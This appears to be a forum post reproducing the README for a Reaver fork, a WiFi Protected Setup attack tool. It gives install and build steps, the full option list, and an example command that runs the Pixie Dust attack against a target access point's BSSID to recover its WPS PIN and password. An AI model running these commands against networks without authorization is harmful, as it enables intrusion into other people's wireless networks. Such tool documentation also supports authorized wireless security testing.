ReaverWPS Fork 1.5.2 Stable

Reaver-wps-fork-t6x is a modification done from a fork of reaver (Login or Signup to view links / downloads)
This modified version uses the attack Pixie Dust to find the correct pin number of wps
The attack used in this version was developed by Wiire (Login or Signup to view links / downloads)

Whitepaper: Login or Signup to view links / downloads

Install Required Libraries and Tools

Libraries for reaver

Code:

Select All

 sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

Tools
You must have installed the pixiewps created by Wiire (Login or Signup to view links / downloads)

Compile and Install

Build Reaver

Code:

Select All

	cd reaver-1.4
	cd src
	./configure
	make

Install Reaver

Code:

Select All

sudo make install

Usage

Code:

Select All

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
 
Required Arguments:
		-i, --interface=<wlan>		  Name of the monitor-mode interface to use
		-b, --bssid=<mac>			   BSSID of the target AP
 
Optional Arguments:
		-m, --mac=<mac>				 MAC of the host system
		-e, --essid=<ssid>			  ESSID of the target AP
		-c, --channel=<channel>		 Set the 802.11 channel for the interface (implies -f)
		-o, --out-file=<file>		   Send output to a log file [stdout]
		-s, --session=<file>			Restore a previous session file
		-C, --exec=<command>			Execute the supplied command upon successful pin recovery
		-D, --daemonize				 Daemonize reaver
		-a, --auto					  Auto detect the best advanced options for the target AP
		-f, --fixed					 Disable channel hopping
		-5, --5ghz					  Use 5GHz 802.11 channels
		-v, --verbose				   Display non-critical warnings (-vv for more)
		-q, --quiet					 Only display critical messages
		-K, --pixie-dust				Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR
		-Z, --no-auto-pass			  Not run automatically reaver to get the password when the pixiewps retrieves the pin
		-h, --help					  Show help
 
Advanced Options:
		-p, --pin=<wps pin>			 Use the specified 4 or 8 digit WPS pin
		-d, --delay=<seconds>		   Set the delay between pin attempts [1]
		-l, --lock-delay=<seconds>	  Set the time to wait if the AP locks WPS pin attempts [60]
		-g, --max-attempts=<num>		Quit after num pin attempts
		-x, --fail-wait=<seconds>	   Set the time to sleep after 10 unexpected failures [0]
		-r, --recurring-delay=<x:y>	 Sleep for y seconds every x pin attempts
		-t, --timeout=<seconds>		 Set the receive timeout period [5]
		-T, --m57-timeout=<seconds>	 Set the M5/M7 timeout period [0.20]
		-A, --no-associate			  Do not associate with the AP (association must be done by another application)
		-N, --no-nacks				  Do not send NACK messages when out of order packets are received
		-S, --dh-small				  Use small DH keys to improve crack speed
		-L, --ignore-locks			  Ignore locked state reported by the target AP
		-E, --eap-terminate			 Terminate each WPS session with an EAP FAIL packet
		-n, --nack					  Target AP always sends a NACK [Auto]
		-w, --win7					  Mimic a Windows 7 registrar [False]
		-X, --exhaustive				Set exhaustive mode from the beginning of the session [False]
		-1, --p1-index				  Set initial array index for the first half of the pin [False]
		-2, --p2-index				  Set initial array index for the second half of the pin [False]
		-P, --pixiepust-loop			Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]

Example:

Code:

Select All

reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1;

Option (K)

Code:

Select All

The -K option 1 run pixiewps without PKR and the hash1 = hash2 = 0
The -K option 2 runs pixiewps without PKR and the hash1 = hash2 = 0 but using the -n option of pixiewps (E-Once)
The -K option 3 runs pixiewps with PKR and the hash1 = hash2 = e-once

**Use the reaver with the option -S when you take your test without the pkr

Contribution

Modifications made by t6_x
Modifications made by DataHead

Some ideas made by nooro